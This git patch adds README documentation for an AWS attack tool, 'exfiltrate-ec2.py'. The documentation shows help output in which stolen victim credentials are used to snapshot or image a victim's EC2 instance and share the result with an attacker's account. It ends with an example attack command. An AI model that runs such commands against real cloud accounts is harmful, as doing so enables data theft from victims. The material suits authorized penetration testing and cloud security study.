From 54da016b7093696a033aac5c828c5f7d372cbd55 Mon Sep 17 00:00:00 2001
From: mgeeky
Date: Wed, 4 Dec 2019 17:58:39 +0100
Subject: [PATCH] Readme updated
---
 clouds/aws/README.md | 55 ++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 55 insertions(+)
diff --git a/clouds/aws/README.md b/clouds/aws/README.md
index 7573005..9379aea 100644
--- a/clouds/aws/README.md
+++ b/clouds/aws/README.md
@@ -103,6 +103,61 @@ IAM Permissions abused: - `ec2:CreateImage` ``` +attacker $ python3 ./exfiltrate-ec2.py --help + + :: exfiltrate-ec2 + Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume + Mariusz B. / mgeeky '19, + +usage: ./exfiltrate-ec2.py [-h] [--region REGION] [--profile PROFILE] + [--access-key ACCESS_KEY] [--secret-key SECRET_KEY] + [--token TOKEN] [--victim-profile VICTIM_PROFILE] + [--victim-access-key VICTIM_ACCESS_KEY] + [--victim-secret-key VICTIM_SECRET_KEY] + [--victim-token VICTIM_TOKEN] [-v] + {createimage,createsnapshot} ... + +positional arguments: + {createimage,createsnapshot} + Available methods + createimage Creates a snapshot of a running or stopped EC2 + instance in an AMI image form. This AMI image will + then be shared with another AWS account, constituing + exfiltration opportunity. + createsnapshot Creates a snapshot of an EBS volume used by an EC2 + instance. This snapshot will then be shared with + another AWS account, constituing exfiltration + opportunity. + +required arguments: + --region REGION AWS Region to use. + +optional arguments: + -v, --verbose Display verbose output. 
+ +Attacker's AWS credentials - where to instantiate exfiltrated EC2: + --profile PROFILE Attacker's AWS Profile name to use if --access-key was + not specified + --access-key ACCESS_KEY + Attacker's AWS Access Key ID to use if --profile was + not specified + --secret-key SECRET_KEY + Attacker's AWS Secret Key ID + --token TOKEN (Optional) Attacker's AWS temporary session token + +Victim AWS credentials - where to find EC2 to exfiltrate: + --victim-profile VICTIM_PROFILE + Victim's AWS Profile name to use if --access-key was + not specified + --victim-access-key VICTIM_ACCESS_KEY + Victim's AWS Access Key ID to use if --profile was not + specified + --victim-secret-key VICTIM_SECRET_KEY + Victim's AWS Secret Key ID + --victim-token VICTIM_TOKEN + (Optional) Victim's AWS temporary session token + + attacker $ python3 ./exfiltrate-ec2.py --region us-east-1 -v --profile default --victim-profile victim-profile createsnapshot --volume-id vol-0f340890acfXXXXX --attach-instance-id i-0b359b0fcbcYYYYY :: exfiltrate-ec2